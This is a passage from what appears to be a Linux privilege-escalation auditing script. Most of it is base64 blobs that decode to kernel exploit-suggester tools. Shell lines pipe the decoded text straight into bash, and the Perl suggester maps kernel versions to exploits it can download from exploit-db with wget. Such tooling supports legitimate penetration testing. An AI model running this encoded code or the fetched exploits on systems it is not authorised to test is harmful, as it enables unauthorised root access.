Nob3dfZG9zIiA9PSAiZmFsc2UiIF0gJiYgWyAtbiAiJGRvcyIgXSAmJiBjb250aW51ZQoKCSMgaGFuZGxlcyAtLWZldGNoLWJpbmFyaWVzIG9wdGlvbgoJaWYgWyAkb3B0X2ZldGNoX2JpbnMgPSAidHJ1ZSIgXTsgdGhlbgogICAgICAgIGZvciBpIGluICQoZWNobyAiJEVYUCIgfCBncmVwICJiaW4tdXJsOiAiIHwgYXdrICd7cHJpbnQgJDJ9Jyk7IGRvCiAgICAgICAgICAgIFsgLWYgIiR7bmFtZX1fJChiYXNlbmFtZSAkaSkiIF0gJiYgcm0gLWYgIiR7bmFtZX1fJChiYXNlbmFtZSAkaSkiCiAgICAgICAgICAgIHdnZXQgLXEgLWsgIiRpIiAtTyAiJHtuYW1lfV8kKGJhc2VuYW1lICRpKSIKICAgICAgICBkb25lCiAgICBmaQoKCSMgaGFuZGxlcyAtLWZldGNoLXNvdXJjZXMgb3B0aW9uCglpZiBbICRvcHRfZmV0Y2hfc3JjcyA9ICJ0cnVlIiBdOyB0aGVuCiAgICAgICAgWyAtZiAiJHtuYW1lfV8kKGJhc2VuYW1lICRzcmNfdXJsKSIgXSAmJiBybSAtZiAiJHtuYW1lfV8kKGJhc2VuYW1lICRzcmNfdXJsKSIKICAgICAgICB3Z2V0IC1xIC1rICIkc3JjX3VybCIgLU8gIiR7bmFtZX1fJChiYXNlbmFtZSAkc3JjX3VybCkiICYKICAgIGZpCgogICAgIyBkaXNwbGF5IHJlc3VsdCAoc2hvcnQpCglpZiBbICIkb3B0X3N1bW1hcnkiID0gInRydWUiIF07IHRoZW4KCVsgLXogIiR0YWdzIiBdICYmIHRhZ3M9Ii0iCgllY2hvIC1lICIkTkFNRSB8fCAkdGFncyB8fCAkc3JjX3VybCIKCWNvbnRpbnVlCglmaQoKIyBkaXNwbGF5IHJlc3VsdCAoc3RhbmRhcmQpCgllY2hvIC1lICJbK10gJE5BTUUiCgllY2hvIC1lICJcbiAgIERldGFpbHM6ICRkZXRhaWxzIgogICAgICAgIGVjaG8gLWUgIiAgIEV4cG9zdXJlOiAkKGRpc3BsYXlFeHBvc3VyZSAkUkFOSykiCiAgICAgICAgWyAtbiAiJHRhZ3MiIF0gJiYgZWNobyAtZSAiICAgVGFnczogJHRhZ3MiCiAgICAgICAgZWNobyAtZSAiICAgRG93bmxvYWQgVVJMOiAkc3JjX3VybCIKICAgICAgICBbIC1uICIkZXh0X3VybCIgXSAmJiBlY2hvIC1lICIgICBleHQtdXJsOiAkZXh0X3VybCIKICAgICAgICBbIC1uICIkY29tbWVudHMiIF0gJiYgZWNobyAtZSAiICAgQ29tbWVudHM6ICRjb21tZW50cyIKCiAgICAgICAgIyBoYW5kbGVzIC0tZnVsbCBmaWx0ZXIgb3B0aW9uCiAgICAgICAgaWYgWyAiJG9wdF9mdWxsIiA9ICJ0cnVlIiBdOyB0aGVuCiAgICAgICAgICAgIFsgLW4gIiRyZXFzIiBdICYmIGVjaG8gLWUgIiAgIFJlcXVpcmVtZW50czogJHJlcXMiCgogICAgICAgICAgICBbIC1uICIkRVhQTE9JVF9EQiIgXSAmJiBlY2hvIC1lICIgICBleHBsb2l0LWRiOiAkRVhQTE9JVF9EQiIKCiAgICAgICAgICAgIGF1dGhvcj0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAiYXV0aG9yOiAiIHwgY3V0IC1kJyAnIC1mIDItKQogICAgICAgICAgICBbIC1uICIkYXV0aG9yIiBdICYmIGVjaG8gLWUgIiAgIGF1dGhvcjogJGF1dGhvciIKICAgICAgICBmaQoKICAgICAgICBlY2hvCgpkb25lCg==" - echo $les_b64 | base64 -d | bash - echo "" - fi - - if [ "$(command -v perl 2>/dev/null)" ]; then - print_2title "Executing Linux Exploit Suggester 2" - print_info "https://github.com/jondonas/linux-exploit-suggester-2" - les2_b64="IyEvdXNyL2Jpbi9wZXJsCnVzZSBzdHJpY3Q7CnVzZSB3YXJuaW5nczsKdXNlIEdldG9wdDo6U3RkOwoKb3VyICRWRVJTSU9OID0gJzInOwoKbXkgJW9wdHM7CmdldG9wdHMoICdrOmhkJywgXCVvcHRzICk7CmlmIChleGlzdHMgJG9wdHN7aH0pIHsKICAgIHVzYWdlKCk7CiAgICBleGl0Owp9OwoKcHJpbnRfYmFubmVyKCk7Cm15ICggJGtob3N0LCAkaXNfcGFydGlhbCApID0gZ2V0X2tlcm5lbCgpOwpwcmludCAiICBMb2NhbCBLZXJuZWw6IFxlWzAwOzMzbSRraG9zdFxlWzAwbVxuIjsKCm15ICVleHBsb2l0cyA9IGdldF9leHBsb2l0cygpOwpwcmludCAnICBTZWFyY2hpbmcgJyAuIHNjYWxhciBrZXlzKCVleHBsb2l0cykgLiAiIGV4cGxvaXRzLi4uXG5cbiI7CnByaW50ICIgIFxlWzE7MzVtUG9zc2libGUgRXhwbG9pdHNcZVswMG1cbiI7CgpteSAkY291bnQgPSAxOwpteSBAYXBwbGljYWJsZSA9ICgpOwpFWFBMT0lUOgpmb3JlYWNoIG15ICRrZXkgKCBzb3J0IGtleXMgJWV4cGxvaXRzICkgewogICAgZm9yZWFjaCBteSAka2VybmVsICggQHsgJGV4cGxvaXRzeyRrZXl9e3Z1bG59IH0gKSB7CgogICAgICAgIGlmICggICAgICRraG9zdCBlcSAka2VybmVsCiAgICAgICAgICAgICAgb3IgKCAkaXNfcGFydGlhbCBhbmQgaW5kZXgoJGtlcm5lbCwka2hvc3QpID09IDAgKQogICAgICAgICkgewogICAgICAgICAgICAkZXhwbG9pdHN7JGtleX17a2V5fSA9ICRrZXk7CiAgICAgICAgICAgIHB1c2goQGFwcGxpY2FibGUsICRleHBsb2l0c3ska2V5fSk7CiAgICAgICAgICAgIHByaW50ICIgIFxlWzAwOzMzbVtcZVswMG1cZVswMDszMW0kY291bnRcZVswMG1cZVswMDszM21dXGVbMDBtICI7CiAgICAgICAgICAgIHByaW50ICJcZVswMDszM20ka2V5XGVbMDBtIjsKICAgICAgICAgICAgcHJpbnQgIiBcZVswMDszM20oJGtlcm5lbClcZVswMG0iIGlmICRpc19wYXJ0aWFsOwoKICAgICAgICAgICAgbXkgJGFsdCA9ICRleHBsb2l0c3ska2V5fXthbHR9OwogICAgICAgICAgICBteSAkY3ZlID0gJGV4cGxvaXRzeyRrZXl9e2N2ZX07CiAgICAgICAgICAgIG15ICRtbHcgPSAkZXhwbG9pdHN7JGtleX17bWlsfTsKICAgICAgICAgICAgaWYgKCAkYWx0IG9yICRjdmUgKSB7CiAgICAgICAgICAgICAgICBwcmludCAiXG4iOwogICAgICAgICAgICB9CiAgICAgICAgICAgIGlmICggJGFsdCApIHsgcHJpbnQgIiAgICAgIEFsdDogJGFsdCAiOyB9CiAgICAgICAgICAgIGlmICggJGN2ZSApIHsgcHJpbnQgIiAgICAgIENWRS0kY3ZlIjsgfQogICAgICAgICAgICBpZiAoICRtbHcgKSB7IHByaW50ICJcbiAgICAgIFNvdXJjZTogJG1sdyI7IH0KICAgICAgICAgICAgcHJpbnQgIlxuIjsKICAgICAgICAgICAgJGNvdW50ICs9IDE7CiAgICAgICAgICAgIG5leHQgRVhQTE9JVDsKICAgICAgICB9CiAgICB9Cn0KcHJpbnQgIlxuIjsKCmlmICghQGFwcGxpY2FibGUpIHsKICAgIHByaW50ICIgIE5vIGV4cGxvaXRzIGFyZSBhdmFpbGFibGUgZm9yIHRoaXMga2VybmVsIHZlcnNpb25cblxuIjsKICAgIGV4aXQ7Cn0KCmlmIChleGlzdHMgJG9wdHN7ZH0pIHsKICAgIHByaW50ICIgIFxlWzE7MzZtRXhwbG9pdCBEb3dubG9hZFxlWzAwbVxuIjsKICAgIHByaW50ICIgIChEb3dubG9hZCBhbGw6IFxlWzAwOzMzbSdhJ1xlWzAwbSAvIEluZGl2aWR1YWxseTogXGVbMDA7MzNtJzIsNCw1J1xlWzAwbSAiOwogICAgcHJpbnQgIi8gRXhpdDogXGVbMDA7MzNtXmNcZVswMG0pXG4iOwogICAgcHJpbnQgIiAgU2VsZWN0IGV4cGxvaXRzIHRvIGRvd25sb2FkOiAiOwoKICAgIHdoaWxlICgxKSB7CiAgICAgICAgbXkgJGlucHV0ID0gPFNURElOPjsKICAgICAgICAkaW5wdXQgPX4gcy9ccysvL2c7CgogICAgICAgIGlmICgkaW5wdXQgPX4gL15hJC8pIHsKICAgICAgICAgICAgbXkgQHNlbGVjdGVkID0gKCk7CiAgICAgICAgICAgIGZvciAobXkgJGk9MTsgJGkgPD0gc2NhbGFyIEBhcHBsaWNhYmxlOyAkaSsrKSB7CiAgICAgICAgICAgICAgIHB1c2goQHNlbGVjdGVkLCAkaSk7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZG93bmxvYWRfZXhwbG9pdHMoXEBzZWxlY3RlZCwgXEBhcHBsaWNhYmxlKTsKICAgICAgICAgICAgbGFzdDsKICAgICAgICB9CiAgICAgICAgZWxzaWYgKCRpbnB1dCA9fiAvXigwfFsxLTldWzAtOV0qKSgsKDB8WzEtOV1bMC05XSopKSokLykgewogICAgICAgICAgICBteSBAc2VsZWN0ZWQgPSB1bmlxKHNwbGl0KCcsJywgJGlucHV0KSk7CiAgICAgICAgICAgIEBzZWxlY3RlZCA9IHNvcnQgeyRhIDw9PiAkYn0gQHNlbGVjdGVkOwogICAgICAgICAgICBpZiAoJHNlbGVjdGVkWzBdID4gMCAmJiAkc2VsZWN0ZWRbLTFdIDw9IHNjYWxhciBAYXBwbGljYWJsZSkgewogICAgICAgICAgICAgICAgZG93bmxvYWRfZXhwbG9pdHMoXEBzZWxlY3RlZCwgXEBhcHBsaWNhYmxlKTsKICAgICAgICAgICAgICAgIGxhc3Q7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZWxzZSB7CiAgICAgICAgICAgICAgIHByaW50ICIgIFxlWzAwOzMxbUlucHV0IGlzIG91dCBvZiByYW5nZS5cZVswMG0gU2VsZWN0IGV4cGxvaXRzIHRvIGRvd25sb2FkOiAiOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIGVsc2UgewogICAgICAgICAgICBwcmludCAiICBcZVswMDszMW1JbnZhbGlkIGlucHV0LlxlWzAwbSBTZWxlY3QgZXhwbG9pdHMgdG8gZG93bmxvYWQ6ICI7CiAgICAgICAgfQogICAgfQp9OwpleGl0OwoKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIyBleHRyYSBmdW5jdGlvbnMgICMjCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKCnN1YiBnZXRfa2VybmVsIHsKICAgIG15ICRraG9zdCA9ICcnOwoKICAgIGlmICggZXhpc3RzICRvcHRze2t9ICkgewogICAgICAgICRraG9zdCA9ICRvcHRze2t9OwogICAgfQogICAgZWxzZSB7CiAgICAgICAgJGtob3N0ID0gYHVuYW1lIC1yIHxjdXQgLWQiLSIgLWYxYDsKICAgICAgICBjaG9tcCAka2hvc3Q7CiAgICB9CgogICAgaWYgKCFkZWZpbmVkICRraG9zdCB8fCAhKCRraG9zdCA9fiAvXlswLTldKyhbLl1bMC05XSspKiQvKSkgewogICAgICAgIHByaW50ICIgIFxlWzAwOzMxbVNwZWNpZmllZCBrZXJuZWwgaXMgaW4gdGhlIHdyb25nIGZvcm1hdFxlWzAwbVxuIjsKICAgICAgICBwcmludCAiICBUcnkgYSBrZXJuZWwgZm9ybWF0IGxpa2UgdGhpczogMy4yLjBcblxuIjsKICAgICAgICBleGl0OwogICAgfQoKICAgICMgcGFydGlhbCBrZXJuZWxzIG1pZ2h0IGJlIHByb3ZpZGVkIGJ5IHRoZSB1c2VyLAogICAgIyBzdWNoIGFzICcyLjQnIG9yICcyLjYuJwogICAgbXkgJGlzX3BhcnRpYWwgPSAka2hvc3QgPX4gL15cZCtcLlxkK1wuXGQ/LyA/IDAgOiAxOwogICAgcmV0dXJuICggJGtob3N0LCAkaXNfcGFydGlhbCApOwp9CgpzdWIgZG93bmxvYWRfZXhwbG9pdHMgewogICAgbXkgKCRzcmVmLCAkYXJlZikgPSBAXzsKICAgIG15IEBzZWxlY3RlZCA9IEB7ICRzcmVmIH07CiAgICBteSBAYXBwbGljYWJsZSA9IEB7ICRhcmVmIH07CiAgICBteSAkZXhwbG9pdF9iYXNlID0gInd3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cyI7CiAgICBteSAkZG93bmxvYWRfYmFzZSA9ICJodHRwczovL3d3dy5leHBsb2l0LWRiLmNvbS9yYXcvIjsKICAgIHByaW50ICJcbiI7CgogICAgZm9yZWFjaCBteSAkbnVtIChAc2VsZWN0ZWQpIHsKICAgICAgICBteSAkbWlsID0gJGFwcGxpY2FibGVbJG51bS0xXXttaWx9OwogICAgICAgIG5leHQgaWYgKCFkZWZpbmVkICRtaWwpOwogICAgICAgIG15ICgkZXhwbG9pdF9udW0pID0gKCRtaWwgPX4gL14uKlwvKFsxLTldWzAtOV0qKVwvPyQvKTsKICAgICAgICAKICAgICAgICBpZiAoJGV4cGxvaXRfbnVtICYmIGluZGV4KCRtaWwsICRleHBsb2l0X2Jhc2UpICE9IC0xKSB7CiAgICAgICAgICAgIG15ICR1cmwgPSAkZG93bmxvYWRfYmFzZSAuICRleHBsb2l0X251bTsKICAgICAgICAgICAgbXkgJGZpbGUgPSAiZXhwbG9pdF8kYXBwbGljYWJsZVskbnVtLTFde2tleX0iOwogICAgICAgICAgICBwcmludCAiICBEb3dubG9hZGluZyBcZVswMDszM20kdXJsXGVbMDBtIC0+IFxlWzAwOzMzbSRmaWxlXGVbMDBtXG4iOwogICAgICAgICAgICBzeXN0ZW0gIndnZXQgJHVybCAtTyAkZmlsZSA+IC9kZXYvbnVsbCAyPiYxIjsKICAgICAgICB9CiAgICAgICAgZWxzZSB7CiAgICAgICAgICAgIHByaW50ICIgIE5vIGV4cGxvaXQgY29kZSBhdmFpbGFibGUgZm9yIFxlWzAwOzMzbSRhcHBsaWNhYmxlWyRudW0tMV17a2V5fVxlWzAwbVxuIjsgCiAgICAgICAgfQogICAgfQogICAgcHJpbnQgIlxuIjsKfQoKc3ViIHVuaXEgewogICAgbXkgJXNlZW47CiAgICBncmVwICEkc2VlbnskX30rKywgQF87Cn0KCnN1YiB1c2FnZSB7CnByaW50X2Jhbm5lcigpOwpwcmludCAiICBcZVswMDszNW1Vc2FnZTpcZVswMG0gJDAgWy1oXSBbLWsga2VybmVsXSBbLWRdXG5cbiI7CnByaW50ICIgIFxlWzAwOzMzbVtcZVswMG1cZVswMDszMW0taFxlWzAwbVxlWzAwOzMzbV1cZVswMG0gSGVscCAodGhpcyBtZXNzYWdlKVxuIjsKcHJpbnQgIiAgXGVbMDA7MzNtW1xlWzAwbVxlWzAwOzMxbS1rXGVbMDBtXGVbMDA7MzNtXVxlWzAwbSBLZXJuZWwgbnVtYmVyIChlZy4gMi42LjI4KVxuIjsKcHJpbnQgIiAgXGVbMDA7MzNtW1xlWzAwbVxlWzAwOzMxbS1kXGVbMDBtXGVbMDA7MzNtXVxlWzAwbSBPcGVuIGV4cGxvaXQgZG93bmxvYWQgbWVudVxuXG4iOwoKcHJpbnQgIiAgWW91IGNhbiBhbHNvIHByb3ZpZGUgYSBwYXJ0aWFsIGtlcm5lbCB2ZXJzaW9uIChlZy4gMi40KVxuIjsKcHJpbnQgIiAgdG8gc2VlIGFsbCBleHBsb2l0cyBhdmFpbGFibGUuXG5cbiI7Cn0KCnN1YiBwcmludF9iYW5uZXIgewpwcmludCAiXG5cZVswMDszM20gICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXGVbMDBtXG4iOwpwcmludCAiXGVbMTszMW0gICAgTGludXggRXhwbG9pdCBTdWdnZXN0ZXIgJFZFUlNJT05cZVswMG1cbiI7CnByaW50ICJcZVswMDszM20gICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXGVbMDBtXG5cbiI7Cn0KCnN1YiBnZXRfZXhwbG9pdHMgewogIHJldHVybiAoCiAgICAndzAwdCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi40LjEwJywgJzIuNC4xNicsICcyLjQuMTcnLCAnMi40LjE4JywKICAgICAgICAgICAgJzIuNC4xOScsICcyLjQuMjAnLCAnMi40LjIxJywKICAgICAgICBdCiAgICB9LAogICAgJ2JyaycgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi40LjEwJywgJzIuNC4xOCcsICcyLjQuMTknLCAnMi40LjIwJywgJzIuNC4yMScsICcyLjQuMjInIF0sCiAgICB9LAogICAgJ2F2ZScgPT4geyB2dWxuID0+IFsgJzIuNC4xOScsICcyLjQuMjAnIF0gfSwKCiAgICAnZWxmbGJsJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbJzIuNC4yOSddLAogICAgICAgIG1pbCAgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNzQ0JywKICAgIH0sCgogICAgJ2VsZmR1bXAnICAgICAgPT4geyB2dWxuID0+IFsnMi40LjI3J10gfSwKICAgICdlbGZjZCcgICAgICAgID0+IHsgdnVsbiA9PiBbJzIuNi4xMiddIH0sCiAgICAnZXhwYW5kX3N0YWNrJyA9PiB7IHZ1bG4gPT4gWycyLjQuMjknXSB9LAoKICAgICdoMDBseXNoaXQnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi44JywgICcyLjYuMTAnLCAnMi42LjExJywgJzIuNi4xMicsCiAgICAgICAgICAgICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLAogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDA2LTM2MjYnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDEzJywKICAgIH0sCgogICAgJ2tkdW1wJyA9PiB7IHZ1bG4gPT4gWycyLjYuMTMnXSB9LAogICAgJ2ttMicgICA9PiB7IHZ1bG4gPT4gWyAnMi40LjE4JywgJzIuNC4yMicgXSB9LAogICAgJ2tyYWQnID0+CiAgICAgIHsgdnVsbiA9PiBbICcyLjYuNScsICcyLjYuNycsICcyLjYuOCcsICcyLjYuOScsICcyLjYuMTAnLCAnMi42LjExJyBdIH0sCgogICAgJ2tyYWQzJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuNScsICcyLjYuNycsICcyLjYuOCcsICcyLjYuOScsICcyLjYuMTAnLCAnMi42LjExJyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL2V4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzEzOTcnLAogICAgfSwKCiAgICAnbG9jYWwyNicgPT4geyB2dWxuID0+IFsnMi42LjEzJ10gfSwKICAgICdsb2tvJyAgICA9PiB7IHZ1bG4gPT4gWyAnMi40LjIyJywgJzIuNC4yMycsICcyLjQuMjQnIF0gfSwKCiAgICAnbXJlbWFwX3B0ZScgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi40LjIwJywgJzIuMi4yNCcsICcyLjQuMjUnLCAnMi40LjI2JywgJzIuNC4yNycgXSwKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTYwJywKICAgIH0sCgogICAgJ25ld2xvY2FsJyA9PiB7IHZ1bG4gPT4gWyAnMi40LjE3JywgJzIuNC4xOScgXSB9LAogICAgJ29uZ19iYWsnICA9PiB7IHZ1bG4gPT4gWycyLjYuNSddIH0sCiAgICAncHRyYWNlJyA9PgogICAgICB7IHZ1bG4gPT4gWyAnMi40LjE4JywgJzIuNC4xOScsICcyLjQuMjAnLCAnMi40LjIxJywgJzIuNC4yMicgXSB9LAogICAgJ3B0cmFjZV9rbW9kJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjQuMTgnLCAnMi40LjE5JywgJzIuNC4yMCcsICcyLjQuMjEnLCAnMi40LjIyJyBdLAogICAgICAgIGN2ZSAgPT4gJzIwMDctNDU3MycsCiAgICB9LAogICAgJ3B0cmFjZV9rbW9kMicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywgJzIuNi4zMCcsICcyLjYuMzEnLAogICAgICAgICAgICAnMi42LjMyJywgJzIuNi4zMycsICcyLjYuMzQnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICdpYTMyc3lzY2FsbCxyb2JlcnRfeW91X3N1Y2snLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNTAyMycsCiAgICAgICAgY3ZlID0+ICcyMDEwLTMzMDEnLAogICAgfSwKICAgICdwdHJhY2UyNCcgPT4geyB2dWxuID0+IFsnMi40LjknXSB9LAogICAgJ3B3bmVkJyAgICA9PiB7IHZ1bG4gPT4gWycyLjYuMTEnXSB9LAogICAgJ3B5MicgICAgICA9PiB7IHZ1bG4gPT4gWyAnMi42LjknLCAnMi42LjE3JywgJzIuNi4xNScsICcyLjYuMTMnIF0gfSwKICAgICdyYXB0b3JfcHJjdGwnID0+IHsKICAgICAgICB2dWxuID0+IFsgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnIF0sCiAgICAgICAgY3ZlICA9PiAnMjAwNi0yNDUxJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMjAzMScsCiAgICB9LAogICAgJ3ByY3RsJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDA0JywKICAgIH0sCiAgICAncHJjdGwyJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDA1JywKICAgIH0sCiAgICAncHJjdGwzJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDA2JywKICAgIH0sCiAgICAncHJjdGw0JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDExJywKICAgIH0sCiAgICAncmVtYXAnICAgICAgPT4geyB2dWxuID0+IFsnMi40J10gfSwKICAgICdyaXAnICAgICAgICA9PiB7IHZ1bG4gPT4gWycyLjInXSB9LAogICAgJ3N0YWNrZ3JvdzInID0+IHsgdnVsbiA9PiBbICcyLjQuMjknLCAnMi42LjEwJyBdIH0sCiAgICAndXNlbGliMjQnID0+IHsKICAgICAgICB2dWxuID0+IFsgJzIuNi4xMCcsICcyLjQuMTcnLCAnMi40LjIyJywgJzIuNC4yNScsICcyLjQuMjcnLCAnMi40LjI5JyBdCiAgICB9LAogICAgJ25ld3NtcCcgICA9PiB7IHZ1bG4gPT4gWycyLjYnXSB9LAogICAgJ3NtcHJhY2VyJyA9PiB7IHZ1bG4gPT4gWycyLjQuMjknXSB9LAogICAgJ2xvZ2lueCcgICA9PiB7IHZ1bG4gPT4gWycyLjQuMjInXSB9LAogICAgJ2V4cC5zaCcgICA9PiB7IHZ1bG4gPT4gWyAnMi42LjknLCAnMi42LjEwJywgJzIuNi4xNicsICcyLjYuMTMnIF0gfSwKICAgICd2bXNwbGljZTEnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4xNycsICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywKICAgICAgICAgICAgJzIuNi4yMycsICcyLjYuMjQnLCAnMi42LjI0LjEnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICdqZXNzaWNhIGJpZWwnLAogICAgICAgIGN2ZSA9PiAnMjAwOC0wNjAwJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNTA5MicsCiAgICB9LAogICAgJ3Ztc3BsaWNlMicgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi42LjIzJywgJzIuNi4yNCcgXSwKICAgICAgICBhbHQgID0+ICdkaWFuZV9sYW5lJywKICAgICAgICBjdmUgID0+ICcyMDA4LTA2MDAnLAogICAgICAgIG1pbCAgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNTA5MycsCiAgICB9LAogICAgJ3Zjb25zb2xlJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbJzIuNiddLAogICAgICAgIGN2ZSAgPT4gJzIwMDktMTA0NicsCiAgICB9LAogICAgJ3NjdHAnID0+IHsKICAgICAgICB2dWxuID0+IFsnMi42LjI2J10sCiAgICAgICAgY3ZlICA9PiAnMjAwOC00MTEzJywKICAgIH0sCiAgICAnZnRyZXgnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4xMScsICcyLjYuMTInLCAnMi42LjEzJywgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywKICAgICAgICAgICAgJzIuNi4xNycsICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAwOC00MjEwJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNjg1MScsCiAgICB9LAogICAgJ2V4aXRfbm90aWZ5JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy84MzY5JywKICAgIH0sCiAgICAndWRldicgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScgXSwKICAgICAgICBhbHQgID0+ICd1ZGV2IDwxLjQuMScsCiAgICAgICAgY3ZlICA9PiAnMjAwOS0xMTg1JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvODQ3OCcsCiAgICB9LAoKICAgICdzb2NrX3NlbmRwYWdlMicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi40LjQnLCAgJzIuNC41JywgICcyLjQuNicsICAnMi40LjcnLCAgJzIuNC44JywgICcyLjQuOScsCiAgICAgICAgICAgICcyLjQuMTAnLCAnMi40LjExJywgJzIuNC4xMicsICcyLjQuMTMnLCAnMi40LjE0JywgJzIuNC4xNScsCiAgICAgICAgICAgICcyLjQuMTYnLCAnMi40LjE3JywgJzIuNC4xOCcsICcyLjQuMTknLCAnMi40LjIwJywgJzIuNC4yMScsCiAgICAgICAgICAgICcyLjQuMjInLCAnMi40LjIzJywgJzIuNC4yNCcsICcyLjQuMjUnLCAnMi40LjI2JywgJzIuNC4yNycsCiAgICAgICAgICAgICcyLjQuMjgnLCAnMi40LjI5JywgJzIuNC4zMCcsICcyLjQuMzEnLCAnMi40LjMyJywgJzIuNC4zMycsCiAgICAgICAgICAgICcyLjQuMzQnLCAnMi40LjM1JywgJzIuNC4zNicsICcyLjQuMzcnLCAnMi42LjAnLCAgJzIuNi4xJywKICAgICAgICAgICAgJzIuNi4yJywgICcyLjYuMycsICAnMi42LjQnLCAgJzIuNi41JywgICcyLjYuNicsICAnMi42LjcnLAogICAgICAgICAgICAnMi42LjgnLCAgJzIuNi45JywgICcyLjYuMTAnLCAnMi42LjExJywgJzIuNi4xMicsICcyLjYuMTMnLAogICAgICAgICAgICAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JywgJzIuNi4xOCcsICcyLjYuMTknLAogICAgICAgICAgICAnMi42LjIwJywgJzIuNi4yMScsICcyLjYuMjInLCAnMi42LjIzJywgJzIuNi4yNCcsICcyLjYuMjUnLAogICAgICAgICAgICAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywgJzIuNi4zMCcsCiAgICAgICAgXSwKICAgICAgICBhbHQgPT4gJ3Byb3RvX29wcycsCiAgICAgICAgY3ZlID0+ICcyMDA5LTI2OTInLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy85NDM2JywKICAgIH0sCgogICAgJ3NvY2tfc2VuZHBhZ2UnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNC40JywgICcyLjQuNScsICAnMi40LjYnLCAgJzIuNC43JywgICcyLjQuOCcsICAnMi40LjknLAogICAgICAgICAgICAnM